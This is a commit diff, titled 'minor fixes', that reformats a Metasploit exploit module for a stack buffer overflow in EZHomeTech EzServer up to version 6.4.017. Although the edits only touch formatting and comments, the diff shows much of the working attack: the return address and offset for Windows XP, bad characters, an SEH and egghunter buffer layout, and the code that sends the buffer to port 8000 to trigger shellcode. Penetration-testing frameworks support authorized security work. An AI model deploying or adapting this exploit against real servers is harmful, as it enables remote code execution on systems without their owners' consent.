minor fixes

2012-06-18 22:44:17 +02:00 · 2012-06-18 22:44:17 +02:00 · 2df237b066
parent 10bd72f3a1
commit 2df237b066
1 changed files with 22 additions and 24 deletions
--- a/modules/exploits/windows/http/ezserver_http.rb
+++ b/modules/exploits/windows/http/ezserver_http.rb
@ -13,22 +13,21 @@ class Metasploit3 < Msf::Exploit::Remote
 	include Msf::Exploit::Remote::Tcp
 	include Msf::Exploit::Remote::Egghunter
 	include Msf::Exploit::Remote::Seh
-	
+
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'		=> 'EZHomeTech EzServer <= 6.4.017 Stack Buffer Overflow Vulnerability',
-			'Description'	=> %q{
-					This module exploits a stack buffer overflow in the EZHomeTech EZServer.
-					If a malicious user sends packets containing an overly long string, 
-					it may be possible to execute a payload remotely. 
-					Due to size constraints, this module uses	the Egghunter technique.
+			'Name'           => 'EZHomeTech EzServer <= 6.4.017 Stack Buffer Overflow Vulnerability',
+			'Description'    => %q{
+				This module exploits a stack buffer overflow in the EZHomeTech EZServer. If a malicious
+				user sends packets containing an overly long string,  it may be possible to execute a
+				payload remotely. Due to size constraints, this module uses	the Egghunter technique.
 			},
-			'License'		=> MSF_LICENSE,
-			'Author'		=>
+			'License'        => MSF_LICENSE,
+			'Author'         =>
 				[
-					'modpr0be<modpr0be@spentera.com>',	# Original discovery, MSF Module
+					'modpr0be<modpr0be@spentera.com>',	# Original discovery and Metasploit module
 				],
-			'References'	=>
+			'References'     =>
 				[
 					[ 'EDB', '19266' ],
 					[ 'URL', 'http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-017-stack-overflow-vulnerability/' ],
@ -37,25 +36,24 @@ class Metasploit3 < Msf::Exploit::Remote
 				{
 					'ExitFunction' => 'seh',
 				},
-			'Platform'	=> 'win',
-			'Payload'	=>
+			'Platform'       => 'win',
+			'Payload'        =>
 				{
 					'BadChars' => "\x00\x0a\x0d\x20\x2e\x2f\x3a",
 					'DisableNops' => true,
 				},
-
-			'Targets'		=>
+			'Targets'        =>
 				[
 					[ 'EzHomeTech EzServer <= 6.4.017 (Windows XP Universal)',
 						{
-							'Ret'   	=>	0x10212779,
-							'Offset'	=>	5852
+							'Ret' => 0x10212779, # pop ecx # pop ebx # ret 4 - msvcrtd.dll
+							'Offset' =>	5852
 						}
-					], # pop ecx # pop ebx # ret 4 - msvcrtd.dll
+					],
 				],
-			'Privileged'	=> false,
-			'DisclosureDate'	=> 'Jun 18 2012',
-			'DefaultTarget'	=> 0))
+			'Privileged'     => false,
+			'DisclosureDate' => 'Jun 18 2012',
+			'DefaultTarget'  => 0))

 		register_options([Opt::RPORT(8000)], self.class)

@ -68,9 +66,9 @@ class Metasploit3 < Msf::Exploit::Remote
 			:checksum => true,
 			:eggtag => "w00t"
 		}
-		
+
 		hunter = generate_egghunter(payload.encoded,payload_badchars,eggoptions)
-		egg = hunter[1]   		
+		egg = hunter[1]
 		buff = rand_text(target['Offset'] - egg.length) #junk
 		buff << egg
 		buff << make_nops(32)
@ -81,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote

 		print_status("Triggering shellcode now...")
 		print_status("Please be patient, the egghunter may take a while..")
-		
+
 		sock.put(buff)

 		handler